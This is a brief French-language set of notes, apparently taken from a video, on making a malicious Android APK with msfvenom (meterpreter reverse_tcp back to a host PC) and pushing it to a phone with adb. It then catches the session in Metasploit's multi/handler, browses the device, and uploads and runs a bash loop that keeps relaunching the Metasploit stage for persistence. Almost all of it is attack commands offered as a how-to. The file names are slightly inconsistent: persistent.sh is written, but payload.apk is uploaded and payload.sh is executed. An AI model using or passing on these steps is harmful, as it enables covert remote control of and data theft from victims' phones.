Skip to main content

Android payload

 

from https://www.youtube.com/watch?v=AT-1_uJjA7M


commencer par créer une application malveillante a laide de msfvenom

port et ip du pc host
lhost=192.168.1.176
lport=45678

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.176 lport=45678 > ~/Desktop/payload.apk

 

le push dans un téléphone
adb push payload.apk sdcard/Download/

installer et lancer lapplication avec tout les droit

 

ouvrire la console sur le pc host

metasploit

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.176
set lport 45678
run

 

quand un appareil sera connecter il ouvrira une meterpreter session

Commande pour avoir les info sur lappareil
sysinfo


on va rendre le payload persistant a laide dun script

persistent.sh

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

créer un script avec ce code


se connecter a une session (appareil avec le payload)

sessions -i 1 
sessions -i x

 

quand on a "metrpreter > " nous somme dnas un appareil on peut utilsier cd et ls pour ce déplacer 
on va a la racine puis sdcard et downlaod
cd /sdcard/Download

on upload le script 
upload ~/Desktop/payload.apk

on utiliser la commande pour passer sur le terminal 

shell

et on executer le fichier 

sh payload.sh